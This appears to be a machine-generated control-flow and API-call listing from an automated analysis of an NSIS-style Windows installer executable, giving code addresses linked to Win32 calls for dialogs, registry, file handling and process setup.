3597 405509 GetDlgItemTextA 3537->3597 3539 40439b GetDlgItem 3538->3539 3543 4043fa 3538->3543 3542 4043af 3539->3542 3541 404389 3545 405f9a 5 API calls 3541->3545 3546 4043c3 SetWindowTextA 3542->3546 3549 40583a 4 API calls 3542->3549 3544 4044de 3543->3544 3551 405d51 18 API calls 3543->3551 3595 404688 3543->3595 3544->3595 3599 405509 GetDlgItemTextA 3544->3599 
3545->3538 3550 403f14 19 API calls 3546->3550 3548 403f7b 8 API calls 3553 40469c 3548->3553 3554 4043b9 3549->3554 3555 4043df 3550->3555 3556 40446e SHBrowseForFolderA 3551->3556 3552 40450e 3557 40588f 18 API calls 3552->3557 3554->3546 3561 4057a1 3 API calls 3554->3561 3558 403f14 19 API calls 3555->3558 3556->3544 3559 404486 CoTaskMemFree 3556->3559 3560 404514 3557->3560 3562 4043ed 3558->3562 3563 4057a1 3 API calls 3559->3563 3600 405d2f lstrcpynA 3560->3600 3561->3546 3598 403f49 SendMessageA 3562->3598 3567 404493 3563->3567 3566 4043f3 3570 4060c8 5 API calls 3566->3570 3568 4044ca SetDlgItemTextA 3567->3568 3572 405d51 18 API calls 3567->3572 3568->3544 3569 40452b 3571 4060c8 5 API calls 3569->3571 3570->3543 3579 404532 3571->3579 3573 4044b2 lstrcmpiA 3572->3573 3573->3568 3575 4044c3 lstrcatA 3573->3575 3574 40456e 3601 405d2f lstrcpynA 3574->3601 3575->3568 3577 404575 3578 40583a 4 API calls 3577->3578 3580 40457b GetDiskFreeSpaceA 3578->3580 3579->3574 3583 4057e8 2 API calls 3579->3583 3585 4045c6 3579->3585 3582 40459f MulDiv 3580->3582 3580->3585 3582->3585 3583->3579 3584 404637 3587 40465a 3584->3587 3589 40140b 2 API calls 3584->3589 3585->3584 3586 4047ce 21 API calls 3585->3586 3588 404624 3586->3588 3602 403f36 EnableWindow 3587->3602 3590 404639 SetDlgItemTextA 3588->3590 3591 404629 3588->3591 3589->3587 3590->3584 3593 404709 21 API calls 3591->3593 3593->3584 3594 404676 3594->3595 3603 4042e7 3594->3603 3595->3548 3597->3541 3598->3566 3599->3552 3600->3569 3601->3577 3602->3594 3604 4042f5 3603->3604 3605 4042fa SendMessageA 3603->3605 3604->3605 3605->3595 3606 4019d2 3607 402a3a 18 API calls 3606->3607 3608 4019d9 3607->3608 3609 402a3a 18 API calls 3608->3609 3610 4019e2 3609->3610 3611 4019e9 lstrcmpiA 3610->3611 3612 4019fb lstrcmpA 3610->3612 3613 4019ef 3611->3613 3612->3613 3614 4021d2 3615 402a3a 18 API calls 3614->3615 3616 4021d8 3615->3616 3617 402a3a 18 API calls 3616->3617 3618 4021e1 3617->3618 3619 402a3a 18 API 
calls 3618->3619 3620 4021ea 3619->3620 3621 406033 2 API calls 3620->3621 3622 4021f3 3621->3622 3623 402204 lstrlenA lstrlenA 3622->3623 3627 4021f7 3622->3627 3625 404f48 25 API calls 3623->3625 3624 404f48 25 API calls 3628 4021ff 3624->3628 3626 402240 SHFileOperationA 3625->3626 3626->3627 3626->3628 3627->3624 3627->3628 3629 4014d6 3630 402a1d 18 API calls 3629->3630 3631 4014dc Sleep 3630->3631 3633 4028cf 3631->3633 3634 40155b 3635 401577 ShowWindow 3634->3635 3636 40157e 3634->3636 3635->3636 3637 40158c ShowWindow 3636->3637 3638 4028cf 3636->3638 3637->3638 3639 40255c 3640 402a1d 18 API calls 3639->3640 3645 402566 3640->3645 3641 4025d0 3642 405a1a ReadFile 3642->3645 3643 4025d2 3648 405c8d wsprintfA 3643->3648 3644 4025e2 3644->3641 3647 4025f8 SetFilePointer 3644->3647 3645->3641 3645->3642 3645->3643 3645->3644 3647->3641 3648->3641 3649 40405d 3650 404073 3649->3650 3655 40417f 3649->3655 3653 403f14 19 API calls 3650->3653 3651 4041ee 3652 4042c2 3651->3652 3654 4041f8 GetDlgItem 3651->3654 3660 403f7b 8 API calls 3652->3660 3656 4040c9 3653->3656 3657 40420e 3654->3657 3658 404280 3654->3658 3655->3651 3655->3652 3659 4041c3 GetDlgItem SendMessageA 3655->3659 3661 403f14 19 API calls 3656->3661 3657->3658 3666 404234 6 API calls 3657->3666 3658->3652 3662 404292 3658->3662 3680 403f36 EnableWindow 3659->3680 3664 4042bd 3660->3664 3665 4040d6 CheckDlgButton 3661->3665 3667 404298 SendMessageA 3662->3667 3668 4042a9 3662->3668 3678 403f36 EnableWindow 3665->3678 3666->3658 3667->3668 3668->3664 3671 4042af SendMessageA 3668->3671 3669 4041e9 3672 4042e7 SendMessageA 3669->3672 3671->3664 3672->3651 3673 4040f4 GetDlgItem 3679 403f49 SendMessageA 3673->3679 3675 40410a SendMessageA 3676 404131 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 3675->3676 3677 404128 GetSysColor 3675->3677 3676->3664 3677->3676 3678->3673 3679->3675 3680->3669 3681 40205e 3682 402a3a 18 API calls 3681->3682 3683 402065 3682->3683 3684 402a3a 18 API 
calls 3683->3684 3685 40206f 3684->3685 3686 402a3a 18 API calls 3685->3686 3687 402079 3686->3687 3688 402a3a 18 API calls 3687->3688 3689 402083 3688->3689 3690 402a3a 18 API calls 3689->3690 3691 40208d 3690->3691 3692 4020cc CoCreateInstance 3691->3692 3693 402a3a 18 API calls 3691->3693 3696 4020eb 3692->3696 3698 402193 3692->3698 3693->3692 3694 401423 25 API calls 3695 4021c9 3694->3695 3697 402173 MultiByteToWideChar 3696->3697 3696->3698 3697->3698 3698->3694 3698->3695 3699 401cde GetDlgItem GetClientRect 3700 402a3a 18 API calls 3699->3700 3701 401d0e LoadImageA SendMessageA 3700->3701 3702 401d2c DeleteObject 3701->3702 3703 4028cf 3701->3703 3702->3703 3704 401662 3705 402a3a 18 API calls 3704->3705 3706 401669 3705->3706 3707 402a3a 18 API calls 3706->3707 3708 401672 3707->3708 3709 402a3a 18 API calls 3708->3709 3710 40167b MoveFileA 3709->3710 3711 401687 3710->3711 3712 40168e 3710->3712 3713 401423 25 API calls 3711->3713 3714 406033 2 API calls 3712->3714 3716 4021c9 3712->3716 3713->3716 3715 40169d 3714->3715 3715->3716 3717 405bea 38 API calls 3715->3717 3717->3711 2802 402364 2803 40236a 2802->2803 2804 402a3a 18 API calls 2803->2804 2805 40237c 2804->2805 2806 402a3a 18 API calls 2805->2806 2807 402386 RegCreateKeyExA 2806->2807 2808 4023b0 2807->2808 2809 4028cf 2807->2809 2810 4023c8 2808->2810 2811 402a3a 18 API calls 2808->2811 2812 4023d4 2810->2812 2819 402a1d 2810->2819 2815 4023c1 lstrlenA 2811->2815 2814 4023ef RegSetValueExA 2812->2814 2822 402e9f 2812->2822 2817 402405 RegCloseKey 2814->2817 2815->2810 2817->2809 2820 405d51 18 API calls 2819->2820 2821 402a31 2820->2821 2821->2812 2824 402eb5 2822->2824 2823 402ee3 2842 4030b1 2823->2842 2824->2823 2847 4030c7 SetFilePointer 2824->2847 2828 402f00 GetTickCount 2831 403034 2828->2831 2838 402f4f 2828->2838 2829 40304a 2830 40308c 2829->2830 2835 40304e 2829->2835 2832 4030b1 ReadFile 2830->2832 2831->2814 2832->2831 2833 4030b1 ReadFile 2833->2838 2834 4030b1 ReadFile 2834->2835 
2835->2831 2835->2834 2836 405a49 WriteFile 2835->2836 2836->2835 2837 402fa5 GetTickCount 2837->2838 2838->2831 2838->2833 2838->2837 2839 402fca MulDiv wsprintfA 2838->2839 2845 405a49 WriteFile 2838->2845 2840 404f48 25 API calls 2839->2840 2840->2838 2848 405a1a ReadFile 2842->2848 2846 405a67 2845->2846 2846->2838 2847->2823 2849 402eee 2848->2849 2849->2828 2849->2829 2849->2831 3718 401dea 3719 402a3a 18 API calls 3718->3719 3720 401df0 3719->3720 3721 402a3a 18 API calls 3720->3721 3722 401df9 3721->3722 3723 402a3a 18 API calls 3722->3723 3724 401e02 3723->3724 3725 402a3a 18 API calls 3724->3725 3726 401e0b 3725->3726 3727 401423 25 API calls 3726->3727 3728 401e12 ShellExecuteA 3727->3728 3729 401e3f 3728->3729 3730 40366d 3731 403678 3730->3731 3732 40367f GlobalAlloc 3731->3732 3733 40367c 3731->3733 3732->3733 3734 401eee 3735 402a3a 18 API calls 3734->3735 3736 401ef5 3735->3736 3737 4060c8 5 API calls 3736->3737 3738 401f04 3737->3738 3739 401f1c GlobalAlloc 3738->3739 3748 401f84 3738->3748 3740 401f30 3739->3740 3739->3748 3741 4060c8 5 API calls 3740->3741 3742 401f37 3741->3742 3743 4060c8 5 API calls 3742->3743 3744 401f41 3743->3744 3744->3748 3749 405c8d wsprintfA 3744->3749 3746 401f78 3750 405c8d wsprintfA 3746->3750 3749->3746 3750->3748 3751 4014f0 SetForegroundWindow 3752 4028cf 3751->3752 3758 4018f5 3759 40192c 3758->3759 3760 402a3a 18 API calls 3759->3760 3761 401931 3760->3761 3762 4055d1 69 API calls 3761->3762 3763 40193a 3762->3763 3764 4024f7 3765 402a3a 18 API calls 3764->3765 3766 4024fe 3765->3766 3769 4059a2 GetFileAttributesA CreateFileA 3766->3769 3768 40250a 3769->3768 3770 4018f8 3771 402a3a 18 API calls 3770->3771 3772 4018ff 3771->3772 3773 405525 MessageBoxIndirectA 3772->3773 3774 401908 3773->3774 3775 4014fe 3776 401506 3775->3776 3778 401519 3775->3778 3777 402a1d 18 API calls 3776->3777 3777->3778 3779 402b7f 3780 402ba7 3779->3780 3781 402b8e SetTimer 3779->3781 3782 402bfc 3780->3782 3783 402bc1 MulDiv 
wsprintfA SetWindowTextA SetDlgItemTextA 3780->3783 3781->3780 3783->3782 3784 401000 3785 401037 BeginPaint GetClientRect 3784->3785 3786 40100c DefWindowProcA 3784->3786 3787 4010f3 3785->3787 3789 401179 3786->3789 3790 401073 CreateBrushIndirect FillRect DeleteObject 3787->3790 3791 4010fc 3787->3791 3790->3787 3792 401102 CreateFontIndirectA 3791->3792 3793 401167 EndPaint 3791->3793 3792->3793 3794 401112 6 API calls 3792->3794 3793->3789 3794->3793 3795 401b02 3796 402a3a 18 API calls 3795->3796 3797 401b09 3796->3797 3798 402a1d 18 API calls 3797->3798 3799 401b12 wsprintfA 3798->3799 3800 4028cf 3799->3800 3801 402482 3802 402b44 19 API calls 3801->3802 3803 40248c 3802->3803 3804 402a1d 18 API calls 3803->3804 3805 402495 3804->3805 3806 4024b8 RegEnumValueA 3805->3806 3807 4024ac RegEnumKeyA 3805->3807 3808 4026a6 3805->3808 3806->3808 3809 4024d1 RegCloseKey 3806->3809 3807->3809 3809->3808 2755 401a03 2761 402a3a 2755->2761 2758 401a20 2759 401a25 lstrcmpA 2758->2759 2760 401a33 2758->2760 2759->2760 2762 402a46 2761->2762 2763 405d51 18 API calls 2762->2763 2764 402a67 2763->2764 2765 401a0c ExpandEnvironmentStringsA 2764->2765 2766 405f9a 5 API calls 2764->2766 2765->2758 2765->2760 2766->2765 3811 402283 3812 40228b 3811->3812 3815 402291 3811->3815 3813 402a3a 18 API calls 3812->3813 3813->3815 3814 402a3a 18 API calls 3816 4022a1 3814->3816 3815->3814 3815->3816 3817 402a3a 18 API calls 3816->3817 3819 4022af 3816->3819 3817->3819 3818 402a3a 18 API calls 3820 4022b8 WritePrivateProfileStringA 3818->3820 3819->3818 3821 405086 3822 405231 3821->3822 3823 4050a8 GetDlgItem GetDlgItem GetDlgItem 3821->3823 3825 405261 3822->3825 3826 405239 GetDlgItem CreateThread CloseHandle 3822->3826 3866 403f49 SendMessageA 3823->3866 3827 4052b0 3825->3827 3828 405277 ShowWindow ShowWindow 3825->3828 3829 40528f 3825->3829 3826->3825 3835 403f7b 8 API calls 3827->3835 3868 403f49 SendMessageA 3828->3868 3830 4052ea 3829->3830 3833 4052c3 ShowWindow 3829->3833 
3834 40529f 3829->3834 3830->3827 3839 4052f7 SendMessageA 3830->3839 3831 405118 3836 40511f GetClientRect GetSystemMetrics SendMessageA SendMessageA 3831->3836 3842 4052e3 3833->3842 3843 4052d5 3833->3843 3840 403eed SendMessageA 3834->3840 3841 4052bc 3835->3841 3837 405171 SendMessageA SendMessageA 3836->3837 3838 40518d 3836->3838 3837->3838 3844 4051a0 3838->3844 3845 405192 SendMessageA 3838->3845 3839->3841 3846 405310 CreatePopupMenu 3839->3846 3840->3827 3848 403eed SendMessageA 3842->3848 3847 404f48 25 API calls 3843->3847 3850 403f14 19 API calls 3844->3850 3845->3844 3849 405d51 18 API calls 3846->3849 3847->3842 3848->3830 3851 405320 AppendMenuA 3849->3851 3852 4051b0 3850->3852 3853 405351 TrackPopupMenu 3851->3853 3854 40533e GetWindowRect 3851->3854 3855 4051b9 ShowWindow 3852->3855 3856 4051ed GetDlgItem SendMessageA 3852->3856 3853->3841 3857 40536d 3853->3857 3854->3853 3858 4051dc 3855->3858 3859 4051cf ShowWindow 3855->3859 3856->3841 3860 405214 SendMessageA SendMessageA 3856->3860 3861 40538c SendMessageA 3857->3861 3867 403f49 SendMessageA 3858->3867 3859->3858 3860->3841 3861->3861 3862 4053a9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3861->3862 3864 4053cb SendMessageA 3862->3864 3864->3864 3865 4053ed GlobalUnlock SetClipboardData CloseClipboard 3864->3865 3865->3841 3866->3831 3867->3856 3868->3829 2934 402308 2935 402338 2934->2935 2936 40230d 2934->2936 2938 402a3a 18 API calls 2935->2938 2947 402b44 2936->2947 2939 40233f 2938->2939 2951 402a7a RegOpenKeyExA 2939->2951 2940 402314 2941 40231e 2940->2941 2946 402357 2940->2946 2942 402a3a 18 API calls 2941->2942 2944 402325 RegDeleteValueA RegCloseKey 2942->2944 2944->2946 2948 402a3a 18 API calls 2947->2948 2949 402b5d 2948->2949 2950 402b6b RegOpenKeyExA 2949->2950 2950->2940 2953 402aa5 2951->2953 2959 402355 2951->2959 2952 402acb RegEnumKeyA 2952->2953 2954 402add RegCloseKey 2952->2954 2953->2952 2953->2954 2955 402b02 RegCloseKey 2953->2955 2957 402a7a 5 API calls 
2953->2957 2961 4060c8 GetModuleHandleA 2954->2961 2955->2959 2957->2953 2959->2946 2960 402b1d RegDeleteKeyA 2960->2959 2962 4060e4 2961->2962 2963 4060ee GetProcAddress 2961->2963 2967 40605a GetSystemDirectoryA 2962->2967 2965 402aed 2963->2965 2965->2959 2965->2960 2966 4060ea 2966->2963 2966->2965 2968 40607c wsprintfA LoadLibraryExA 2967->2968 2968->2966 3869 401c8a 3870 402a1d 18 API calls 3869->3870 3871 401c90 IsWindow 3870->3871 3872 4019f3 3871->3872 3873 40430b 3874 404341 3873->3874 3875 40431b 3873->3875 3876 403f7b 8 API calls 3874->3876 3877 403f14 19 API calls 3875->3877 3878 40434d 3876->3878 3879 404328 SetDlgItemTextA 3877->3879 3879->3874 3120 40310f SetErrorMode GetVersion 3121 403146 3120->3121 3122 40314c 3120->3122 3123 4060c8 5 API calls 3121->3123 3124 40605a 3 API calls 3122->3124 3123->3122 3125 403162 lstrlenA 3124->3125 3125->3122 3126 403171 3125->3126 3127 4060c8 5 API calls 3126->3127 3128 403179 3127->3128 3129 4060c8 5 API calls 3128->3129 3130 403180 #17 OleInitialize SHGetFileInfoA 3129->3130 3208 405d2f lstrcpynA 3130->3208 3132 4031bd GetCommandLineA 3209 405d2f lstrcpynA 3132->3209 3134 4031cf GetModuleHandleA 3135 4031e6 3134->3135 3136 4057cc CharNextA 3135->3136 3137 4031fa CharNextA 3136->3137 3146 40320a 3137->3146 3138 4032d4 3139 4032e7 GetTempPathA 3138->3139 3210 4030de 3139->3210 3141 4032ff 3142 403303 GetWindowsDirectoryA lstrcatA 3141->3142 3143 403359 DeleteFileA 3141->3143 3145 4030de 12 API calls 3142->3145 3220 402c66 GetTickCount GetModuleFileNameA 3143->3220 3144 4057cc CharNextA 3144->3146 3148 40331f 3145->3148 3146->3138 3146->3144 3149 4032d6 3146->3149 3148->3143 3151 403323 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3148->3151 3304 405d2f lstrcpynA 3149->3304 3150 40336d 3157 4057cc CharNextA 3150->3157 3190 4033f3 3150->3190 3203 403403 3150->3203 3153 4030de 12 API calls 3151->3153 3155 403351 3153->3155 3155->3143 3155->3203 3159 403388 3157->3159 3167 403433 3159->3167 
3168 4033ce 3159->3168 3160 40353b 3163 403543 GetCurrentProcess OpenProcessToken 3160->3163 3164 4035bd ExitProcess 3160->3164 3161 40341d 3314 405525 3161->3314 3169 40358e 3163->3169 3170 40355e LookupPrivilegeValueA AdjustTokenPrivileges 3163->3170 3318 4054a8 3167->3318 3171 40588f 18 API calls 3168->3171 3173 4060c8 5 API calls 3169->3173 3170->3169 3174 4033d9 3171->3174 3176 403595 3173->3176 3174->3203 3305 405d2f lstrcpynA 3174->3305 3179 4035aa ExitWindowsEx 3176->3179 3182 4035b6 3176->3182 3177 403454 lstrcatA lstrcmpiA 3181 403470 3177->3181 3177->3203 3178 403449 lstrcatA 3178->3177 3179->3164 3179->3182 3184 403475 3181->3184 3185 40347c 3181->3185 3186 40140b 2 API calls 3182->3186 3183 4033e8 3306 405d2f lstrcpynA 3183->3306 3321 40540e CreateDirectoryA 3184->3321 3326 40548b CreateDirectoryA 3185->3326 3186->3164 3248 4036af 3190->3248 3192 403481 SetCurrentDirectoryA 3193 403490 3192->3193 3194 40349b 3192->3194 3329 405d2f lstrcpynA 3193->3329 3330 405d2f lstrcpynA 3194->3330 3197 405d51 18 API calls 3198 4034da DeleteFileA 3197->3198 3199 4034e7 CopyFileA 3198->3199 3205 4034a9 3198->3205 3199->3205 3200 40352f 3201 405bea 38 API calls 3200->3201 3201->3203 3202 405bea 38 API calls 3202->3205 3307 4035d5 3203->3307 3204 405d51 18 API calls 3204->3205 3205->3197 3205->3200 3205->3202 3205->3204 3206 4054c0 2 API calls 3205->3206 3207 40351b CloseHandle 3205->3207 3206->3205 3207->3205 3208->3132 3209->3134 3211 405f9a 5 API calls 3210->3211 3213 4030ea 3211->3213 3212 4030f4 3212->3141 3213->3212 3214 4057a1 3 API calls 3213->3214 3215 4030fc 3214->3215 3216 40548b 2 API calls 3215->3216 3217 403102 3216->3217 3331 4059d1 3217->3331 3335 4059a2 GetFileAttributesA CreateFileA 3220->3335 3222 402ca6 3247 402cb6 3222->3247 3336 405d2f lstrcpynA 3222->3336 3224 402ccc 3225 4057e8 2 API calls 3224->3225 3226 402cd2 3225->3226 3337 405d2f lstrcpynA 3226->3337 3228 402cdd GetFileSize 3229 402dd9 3228->3229 3241 402cf4 3228->3241 3338 402c02 3229->3338 
3231 402de2 3233 402e12 GlobalAlloc 3231->3233 3231->3247 3350 4030c7 SetFilePointer 3231->3350 3232 4030b1 ReadFile 3232->3241 3349 4030c7 SetFilePointer 3233->3349 3235 402e45 3237 402c02 6 API calls 3235->3237 3237->3247 3238 402dfb 3240 4030b1 ReadFile 3238->3240 3239 402e2d 3242 402e9f 32 API calls 3239->3242 3243 402e06 3240->3243 3241->3229 3241->3232 3241->3235 3244 402c02 6 API calls 3241->3244 3241->3247 3245 402e39 3242->3245 3243->3233 3243->3247 3244->3241 3245->3245 3246 402e76 SetFilePointer 3245->3246 3245->3247 3246->3247 3247->3150 3249 4060c8 5 API calls 3248->3249 3250 4036c3 3249->3250 3251 4036c9 3250->3251 3252 4036db 3250->3252 3360 405c8d wsprintfA 3251->3360 3253 405c16 3 API calls 3252->3253 3256 403706 3253->3256 3255 403724 lstrcatA 3257 4036d9 3255->3257 3256->3255 3258 405c16 3 API calls 3256->3258 3351 403974 3257->3351 3258->3255 3261 40588f 18 API calls 3262 403756 3261->3262 3263 4037df 3262->3263 3265 405c16 3 API calls 3262->3265 3264 40588f 18 API calls 3263->3264 3266 4037e5 3264->3266 3267 403782 3265->3267 3268 4037f5 LoadImageA 3266->3268 3269 405d51 18 API calls 3266->3269 3267->3263 3273 40379e lstrlenA 3267->3273 3276 4057cc CharNextA 3267->3276 3270 40389b 3268->3270 3271 40381c RegisterClassA 3268->3271 3269->3268 3272 40140b 2 API calls 3270->3272 3274 403852 SystemParametersInfoA CreateWindowExA 3271->3274 3303 4038a5 3271->3303 3275 4038a1 3272->3275 3277 4037d2 3273->3277 3278 4037ac lstrcmpiA 3273->3278 3274->3270 3283 403974 19 API calls 3275->3283 3275->3303 3280 40379c 3276->3280 3279 4057a1 3 API calls 3277->3279 3278->3277 3281 4037bc GetFileAttributesA 3278->3281 3284 4037d8 3279->3284 3280->3273 3282 4037c8 3281->3282 3282->3277 3285 4057e8 2 API calls 3282->3285 3286 4038b2 3283->3286 3361 405d2f lstrcpynA 3284->3361 3285->3277 3288 403941 3286->3288 3289 4038be ShowWindow 3286->3289 3362 40501a OleInitialize 3288->3362 3291 40605a 3 API calls 3289->3291 3293 4038d6 3291->3293 3292 403947 3294 403963 
3292->3294 3295 40394b 3292->3295 3296 4038e4 GetClassInfoA 3293->3296 3298 40605a 3 API calls 3293->3298 3297 40140b 2 API calls 3294->3297 3301 40140b 2 API calls 3295->3301 3295->3303 3299 4038f8 GetClassInfoA RegisterClassA 3296->3299 3300 40390e DialogBoxParamA 3296->3300 3297->3303 3298->3296 3299->3300 3302 40140b 2 API calls 3300->3302 3301->3303 3302->3303 3303->3203 3304->3139 3305->3183 3306->3190 3308 4035ed 3307->3308 3309 4035df CloseHandle 3307->3309 3370 40361a 3308->3370 3309->3308 3312 4055d1 69 API calls 3313 40340c OleUninitialize 3312->3313 3313->3160 3313->3161 3315 40553a 3314->3315 3316 40342b ExitProcess 3315->3316 3317 40554e MessageBoxIndirectA 3315->3317 3317->3316 3319 4060c8 5 API calls 3318->3319 3320 403438 lstrcatA 3319->3320 3320->3177 3320->3178 3322 40347a 3321->3322 3323 40545f GetLastError 3321->3323 3322->3192 3323->3322 3324 40546e SetFileSecurityA 3323->3324 3324->3322 3325 405484 GetLastError 3324->3325 3325->3322 3327 40549b 3326->3327 3328 40549f GetLastError 3326->3328 3327->3192 3328->3327 3329->3194 3330->3205 3332 4059dc GetTickCount GetTempFileNameA 3331->3332 3333 40310d 3332->3333 3334 405a09 3332->3334 3333->3141 3334->3332 3334->3333 3335->3222 3336->3224 3337->3228 3339 402c23 3338->3339 3340 402c0b 3338->3340 3343 402c33 GetTickCount 3339->3343 3344 402c2b 3339->3344 3341 402c14 DestroyWindow 3340->3341 3342 402c1b 3340->3342 3341->3342 3342->3231 3345 402c41 CreateDialogParamA ShowWindow 3343->3345 3346 402c64 3343->3346 3347 406104 2 API calls 3344->3347 3345->3346 3346->3231 3348 402c31 3347->3348 3348->3231 3349->3239 3350->3238 3352 403988 3351->3352 3369 405c8d wsprintfA 3352->3369 3354 4039f9 3355 405d51 18 API calls 3354->3355 3356 403a05 SetWindowTextA 3355->3356 3357 403a21 3356->3357 3358 403734 3356->3358 3357->3358 3359 405d51 18 API calls 3357->3359 3358->3261 3359->3357 3360->3257 3361->3263 3363 403f60 SendMessageA 3362->3363 3366 40503d 3363->3366 3364 405064 3365 403f60 SendMessageA 3364->3365 
3367 405076 OleUninitialize 3365->3367 3366->3364 3368 401389 2 API calls 3366->3368 3367->3292 3368->3366 3369->3354 3371 403628 3370->3371 3372 4035f2 3371->3372 3373 40362d FreeLibrary GlobalFree 3371->3373 3372->3312 3373->3372 3373->3373 3374 402410 3375 402b44 19 API calls 3374->3375 3376 40241a 3375->3376 3377 402a3a 18 API calls 3376->3377 3378 402423 3377->3378 3379 40242d RegQueryValueExA 3378->3379 3382 4026a6 3378->3382 3380 402453 RegCloseKey 3379->3380 3381 40244d 3379->3381 3380->3382 3381->3380 3385 405c8d wsprintfA 3381->3385 3385->3380 3386 401f90 3387 401fa2 3386->3387 3388 402050 3386->3388 3389 402a3a 18 API calls 3387->3389 3390 401423 25 API calls 3388->3390 3391 401fa9 3389->3391 3397 4021c9 3390->3397 3392 402a3a 18 API calls 3391->3392 3393 401fb2 3392->3393 3394 401fc7 LoadLibraryExA 3393->3394 3395 401fba GetModuleHandleA 3393->3395 3394->3388 3396 401fd7 GetProcAddress 3394->3396 3395->3394 3395->3396 3398 402023 3396->3398 3399 401fe6 3396->3399 3400 404f48 25 API calls 3398->3400 3402 401ff6 3399->3402 3404 401423 3399->3404 3400->3402 3402->3397 3403 402044 FreeLibrary 3402->3403 3403->3397 3405 404f48 25 API calls 3404->3405 3406 401431 3405->3406 3406->3402 3880 401490 3881 404f48 25 API calls 3880->3881 3882 401497 3881->3882 3468 401595 3469 402a3a 18 API calls 3468->3469 3470 40159c SetFileAttributesA 3469->3470 3471 4015ae 3470->3471 3883 402616 3884 40261d 3883->3884 3886 40287c 3883->3886 3885 402a1d 18 API calls 3884->3885 3887 402628 3885->3887 3888 40262f SetFilePointer 3887->3888 3888->3886 3889 40263f 3888->3889 3891 405c8d wsprintfA 3889->3891 3891->3886 3892 401717 3893 402a3a 18 API calls 3892->3893 3894 40171e SearchPathA 3893->3894 3895 401739 3894->3895 3896 402519 3897 40252e 3896->3897 3898 40251e 3896->3898 3900 402a3a 18 API calls 3897->3900 3899 402a1d 18 API calls 3898->3899 3902 402527 3899->3902 3901 402535 lstrlenA 3900->3901 3901->3902 3903 405a49 WriteFile 3902->3903 3904 402557 3902->3904 3903->3904 
3905 40149d 3906 4014ab PostQuitMessage 3905->3906 3907 40226e 3905->3907 3906->3907 3908 4046a3 3909 4046b3 3908->3909 3910 4046cf 3908->3910 3919 405509 GetDlgItemTextA 3909->3919 3912 404702 3910->3912 3913 4046d5 SHGetPathFromIDListA 3910->3913 3915 4046e5 3913->3915 3918 4046ec SendMessageA 3913->3918 3914 4046c0 SendMessageA 3914->3910 3916 40140b 2 API calls 3915->3916 3916->3918 3918->3912 3919->3914 3920 401ca7 3921 402a1d 18 API calls 3920->3921 3922 401cae 3921->3922 3923 402a1d 18 API calls 3922->3923 3924 401cb6 GetDlgItem 3923->3924 3925 402513 3924->3925 3926 404028 lstrcpynA lstrlenA 2992 40192a 2993 40192c 2992->2993 2994 402a3a 18 API calls 2993->2994 2995 401931 2994->2995 2998 4055d1 2995->2998 3038 40588f 2998->3038 3001 405610 3004 405748 3001->3004 3052 405d2f lstrcpynA 3001->3052 3002 4055f9 DeleteFileA 3003 40193a 3002->3003 3004->3003 3070 406033 FindFirstFileA 3004->3070 3006 405636 3007 405649 3006->3007 3008 40563c lstrcatA 3006->3008 3053 4057e8 lstrlenA 3007->3053 3011 40564f 3008->3011 3012 40565d lstrcatA 3011->3012 3014 405668 lstrlenA FindFirstFileA 3011->3014 3012->3014 3016 40573e 3014->3016 3036 40568c 3014->3036 3015 405766 3073 4057a1 lstrlenA CharPrevA 3015->3073 3016->3004 3018 4057cc CharNextA 3018->3036 3020 405589 5 API calls 3021 405778 3020->3021 3022 405792 3021->3022 3023 40577c 3021->3023 3025 404f48 25 API calls 3022->3025 3023->3003 3027 404f48 25 API calls 3023->3027 3025->3003 3026 40571d FindNextFileA 3028 405735 FindClose 3026->3028 3026->3036 3029 405789 3027->3029 3028->3016 3030 405bea 38 API calls 3029->3030 3033 405790 3030->3033 3032 4055d1 62 API calls 3032->3036 3033->3003 3034 404f48 25 API calls 3034->3026 3035 404f48 25 API calls 3035->3036 3036->3018 3036->3026 3036->3032 3036->3034 3036->3035 3057 405d2f lstrcpynA 3036->3057 3058 405589 3036->3058 3066 405bea MoveFileExA 3036->3066 3076 405d2f lstrcpynA 3038->3076 3040 4058a0 3077 40583a CharNextA CharNextA 3040->3077 3043 4055f1 3043->3001 
3043->3002 3044 405f9a 5 API calls 3050 4058b6 3044->3050 3045 4058e1 lstrlenA 3046 4058ec 3045->3046 3045->3050 3048 4057a1 3 API calls 3046->3048 3047 406033 2 API calls 3047->3050 3049 4058f1 GetFileAttributesA 3048->3049 3049->3043 3050->3043 3050->3045 3050->3047 3051 4057e8 2 API calls 3050->3051 3051->3045 3052->3006 3054 4057f5 3053->3054 3055 405806 3054->3055 3056 4057fa CharPrevA 3054->3056 3055->3011 3056->3054 3056->3055 3057->3036 3083 40597d GetFileAttributesA 3058->3083 3061 4055a4 RemoveDirectoryA 3064 4055b2 3061->3064 3062 4055ac DeleteFileA 3062->3064 3063 4055b6 3063->3036 3064->3063 3065 4055c2 SetFileAttributesA 3064->3065 3065->3063 3067 405c0b 3066->3067 3068 405bfe 3066->3068 3067->3036 3086 405a78 lstrcpyA 3068->3086 3071 405762 3070->3071 3072 406049 FindClose 3070->3072 3071->3003 3071->3015 3072->3071 3074 40576c 3073->3074 3075 4057bb lstrcatA 3073->3075 3074->3020 3075->3074 3076->3040 3078 405855 3077->3078 3080 405865 3077->3080 3079 405860 CharNextA 3078->3079 3078->3080 3082 405885 3079->3082 3081 4057cc CharNextA 3080->3081 3080->3082 3081->3080 3082->3043 3082->3044 3084 405595 3083->3084 3085 40598f SetFileAttributesA 3083->3085 3084->3061 3084->3062 3084->3063 3085->3084 3087 405aa0 3086->3087 3088 405ac6 GetShortPathNameA 3086->3088 3113 4059a2 GetFileAttributesA CreateFileA 3087->3113 3090 405be5 3088->3090 3091 405adb 3088->3091 3090->3067 3091->3090 3093 405ae3 wsprintfA 3091->3093 3092 405aaa CloseHandle GetShortPathNameA 3092->3090 3094 405abe 3092->3094 3095 405d51 18 API calls 3093->3095 3094->3088 3094->3090 3096 405b0b 3095->3096 3114 4059a2 GetFileAttributesA CreateFileA 3096->3114 3098 405b18 3098->3090 3099 405b27 GetFileSize GlobalAlloc 3098->3099 3100 405b49 3099->3100 3101 405bde CloseHandle 3099->3101 3102 405a1a ReadFile 3100->3102 3101->3090 3103 405b51 3102->3103 3103->3101 3115 405907 lstrlenA 3103->3115 3106 405b68 lstrcpyA 3109 405b8a 3106->3109 3107 405b7c 3108 405907 4 API calls 3107->3108 3108->3109 

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            APIs
                                                                                            • SetErrorMode.KERNELBASE ref: 00403134
